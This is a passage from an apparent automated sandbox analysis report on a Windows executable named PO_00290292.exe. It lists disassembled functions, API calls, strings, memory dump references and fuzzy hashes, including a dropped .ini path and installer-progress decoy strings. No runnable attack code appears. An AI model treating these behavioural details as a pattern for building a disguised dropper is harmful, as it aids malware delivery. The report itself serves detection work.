                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                  • String ID: Tahoma
                                                                  • API String ID: 3808545654-3580928618
                                                                  • Opcode ID: 020d429652f6eb968a81cc61bdee73d82fb2a6d644655b906a561d6cebbfb8f5
                                                                  • Instruction ID: 9e8fd183d3d9d3ef172346538d4b27734d94fdc92d2c471f4f64b2fa811a60c8
                                                                  • Opcode Fuzzy Hash: 020d429652f6eb968a81cc61bdee73d82fb2a6d644655b906a561d6cebbfb8f5
                                                                  • Instruction Fuzzy Hash: F601A271544641EFEB016BB0AF4AF9A3F75BB65301F104579F152B61E2CA7C0006AB2D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402D04 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                  • wsprintfW.USER32 ref: 00402D56
                                                                  • SetWindowTextW.USER32(?,?), ref: 00402D66
                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D78
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                  • API String ID: 1451636040-1158693248
                                                                  • Opcode ID: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                                  • Instruction ID: 006a23aec332b8a1771af90dfa9c1e08c84c5b856183a3bf167901723993fe13
                                                                  • Opcode Fuzzy Hash: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                                  • Instruction Fuzzy Hash: 2FF0367050020CABEF206F50DD49BEA3B69FF44305F00803AFA55B51D0DBF959558F59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                  • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                  • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                  • CloseHandle.KERNEL32(?), ref: 00402914
                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                  • String ID:
                                                                  • API String ID: 2667972263-0
                                                                  • Opcode ID: 268536b817805fd7c6aa0ddf0c0313c96854f1d95891718e15f9d7c13f840f6f
                                                                  • Instruction ID: 9003099e8900d80eaa65f9bf21adae6f43ee9946aaa6f9d478ae9c17af360c06
                                                                  • Opcode Fuzzy Hash: 268536b817805fd7c6aa0ddf0c0313c96854f1d95891718e15f9d7c13f840f6f
                                                                  • Instruction Fuzzy Hash: D6216F72801118BBCF216FA5CE49D9E7F79EF09364F24423AF550762E0CB794E419B98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404A99 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3A
                                                                  • wsprintfW.USER32 ref: 00404B43
                                                                  • SetDlgItemTextW.USER32(?,00423728), ref: 00404B56
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                  • String ID: %u.%u%s%s$(7B
                                                                  • API String ID: 3540041739-1320723960
                                                                  • Opcode ID: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                                  • Instruction ID: 8555a1dc09e6b234f76c08cd80d60a8511de1cbf1cdbca66d7a603e4fd23a7b2
                                                                  • Opcode Fuzzy Hash: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                                  • Instruction Fuzzy Hash: E911EB736441283BDB0095AD9C45F9E3298DB85378F150237FA26F71D1DA79D82286EC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini,000000FF,practical,00000400,?,?,00000021), ref: 00402583
                                                                  • lstrlenA.KERNEL32(practical,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini,000000FF,practical,00000400,?,?,00000021), ref: 0040258E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidelstrlen
                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini$practical
                                                                  • API String ID: 3109718747-2608176021
                                                                  • Opcode ID: 9674d1326f11f89bf23c926dc430aeadc8163c92e49c9a6a8ad153ff0b83bdff
                                                                  • Instruction ID: 4789cac02ba757069cd1743e95fa376523a080456913a55bd7acca95e4ec0b97
                                                                  • Opcode Fuzzy Hash: 9674d1326f11f89bf23c926dc430aeadc8163c92e49c9a6a8ad153ff0b83bdff
                                                                  • Instruction Fuzzy Hash: CA11E772A01204BADB10AFB18F4EE9E32659F54355F20403BF502F65C1DAFC8E51576E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                  • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                  • String ID:
                                                                  • API String ID: 1849352358-0
                                                                  • Opcode ID: 6491dc860a80c02085eecb14b1266a63ebbf57ab5d60057a90a3d7af6463b562
                                                                  • Instruction ID: c287ee2e14a47dfcdc45124cadc9b4dd0eb33b5564dd8f2f51e592e83ba53e14
                                                                  • Opcode Fuzzy Hash: 6491dc860a80c02085eecb14b1266a63ebbf57ab5d60057a90a3d7af6463b562
                                                                  • Instruction Fuzzy Hash: 33F0E172600504AFD701DBE4DE88CEEBBBDEB48311B104476F541F51A1CA749D018B38
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405B32 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405B38
                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405B42
                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405B54
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B32
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 2659869361-4083868402
                                                                  • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                  • Instruction ID: 1c34604f245f66d13fb295c2dca74b2082213948d97efa3850964b8affffb698
                                                                  • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                  • Instruction Fuzzy Hash: 57D05E31101934AAC2116B448C04DDB73AC9E46304341442AF201B70A6C778695286FD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00403C9D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowTextW.USER32(00000000,00429240), ref: 00403D35
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: TextWindow
                                                                  • String ID: "C:\Users\user\Desktop\PO_00290292.exe"$1033
                                                                  • API String ID: 530164218-4006631066
                                                                  • Opcode ID: bedfed58f119eb8cdc0f5f3cd8b3d6658457d0e8530e0efc389cee5297b0fc00
                                                                  • Instruction ID: 4786a0dcc4ba2f930af81554b1ec9cb86176e7a1d2ad565e9f211a7c6dcc4e6b
                                                                  • Opcode Fuzzy Hash: bedfed58f119eb8cdc0f5f3cd8b3d6658457d0e8530e0efc389cee5297b0fc00
                                                                  • Instruction Fuzzy Hash: 7111C331B44210ABD7359F15EC40A337B6CEF85715B28427BE801AB3A1C63A9D1296A9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 00405280
                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004052D1
                                                                    • Part of subcall function 0040428E: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                  • String ID:
                                                                  • API String ID: 3748168415-3916222277
                                                                  • Opcode ID: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                                  • Instruction ID: 35360b72f4910b777185a6264b25dc7760dbd7dc789205491e41d57b326ac1ec
                                                                  • Opcode Fuzzy Hash: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                                  • Instruction Fuzzy Hash: 6B019E71210708ABDF208F11DD84E9B3A35EF94321F60443AFA00761D1C77A8D529E6A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405B7E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO_00290292.exe,C:\Users\user\Desktop\PO_00290292.exe,80000000,00000003), ref: 00405B84
                                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO_00290292.exe,C:\Users\user\Desktop\PO_00290292.exe,80000000,00000003), ref: 00405B94
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrlen
                                                                  • String ID: C:\Users\user\Desktop
                                                                  • API String ID: 2709904686-1876063424
                                                                  • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                  • Instruction ID: 87bbc210c64b19a6b78a00595756172ded5dec919d443e3f73ce50da7c0279be
                                                                  • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                  • Instruction Fuzzy Hash: D4D05EB24009209AD312AB04DD00DAF77ACEF163007464426E841AB166D778BC8186BC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405CB8 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC8
                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CE0
                                                                  • CharNextA.USER32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CF1
                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CFA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 190613189-0
                                                                  • Opcode ID: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                                  • Instruction ID: b09c91cad7c2282b041c35ea214dbdd3f15ee75aa50bf55fe933874c09a5e2ef
